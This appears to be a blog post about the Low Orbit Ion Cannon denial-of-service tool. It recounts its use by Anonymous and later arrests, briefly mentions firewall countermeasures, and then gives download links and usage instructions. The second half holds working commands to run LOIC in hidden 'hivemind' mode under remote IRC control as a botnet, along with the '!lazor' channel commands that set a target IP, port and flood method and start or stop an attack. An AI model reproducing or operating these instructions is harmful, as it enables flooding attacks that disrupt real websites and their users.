Low Orbit Ion Canon
LOIC performs a Denial of Service (DoS) attack on a target site by flooding the server with TCP packets or UDP packets with the intention of disrupting the service of a particular host. People have used LOIC to join voluntary botnets.
Countermeasures
Security experts indicated that well-written firewall rules can filter out most traffic from DDoS attacks by LOIC, thus preventing the attacks from being fully effective.
Anonymous
LOIC was utilized by Project Chanology, an offshoot of the Anonymous group, to attack Scientology websites, then by Anonymous itself to successfully attack the Recording Industry Association of America's website in October 2010 and again during Operation Payback in December 2010 to attack the websites of companies and organizations that opposed WikiLeaks. LOIC was utilized by many attackers, despite the fact that a network firewall could easily filter out network traffic it generates, thus rendering it only partly effective.
If an attack is not routed through an anonymization network such as Tor, traceable IP address records can be logged by its recipient. This can be used to identify the individual user conducting DDoS attacks from logs kept by their ISPs. On January 2011 five people were arrested in the UK in connection with the Operation Payback attacks, while in June 2011 a further three LOIC users were arrested in Spain for their involvement in the web attacks. In June 2011 it was reported that Turkish police arrested 32 individuals who allegedly attacked government websites in protest against the introduction of state level web filtering. The individuals are thought to be members of Anonymous that used the LOIC tool in their protest.
Download LOIC v1.1.1.25 here
Download NewEraCracker LOIC 1.1.1.25 here
Download NewEraCracker LOIC 1.1.1.25 (tar) here
How to run on Windows
Get the binaries
Requires Microsoft .NET Framework 3.5 Service Pack 1
How to run on Linux / Mac OSX
Run debug binaries with mono. Read the wiki at https://github.com/NewEraCracker/LOIC/wiki/ for updated instructions
Hivemind/Hidden Mode
Hivemind mode will connect your client to an IRC server so it can be controlled remotely. Think of this as a voluntary botnet. NOTE: It does NOT allow remote administration of your machine, or anything like that; it is literally just control of loic itself.
If you want to start up in Hivemind mode run something like this:
LOIC.exe /hivemind irc.server.address
It will connect to irc://irc.server.adress:6667/loic
You can also specify a port and channel:
LOIC.exe /hivemind irc.server.address 1234 #secret
It will connect to irc://irc.server.adress:1234/secret
In order to do Hivemind Hidden mode, run something like this:
LOIC.exe /hidden /hivemind irc.server.address
It will connect to irc://irc.server.adress:6667/loic without any visible GUI.
Controlling LOIC from PC
As an OP, Admin or owner, set the channel topic or send a message like the following:
!lazor targetip=127.0.0.1 message=test_test port=80 method=tcp wait=false random=true
To start an attack type:
!lazor start
Or just append "start" to the END of the topic:
!lazor targetip=127.0.0.1 message=test_test port=80 method=tcp wait=false random=true start
To reset loic's options back to its defaults:
!lazor default
To stop an attack:
!lazor stop
and be sure to remove "start" from the END of the topic, if it exists, too.
0 comments:
Post a Comment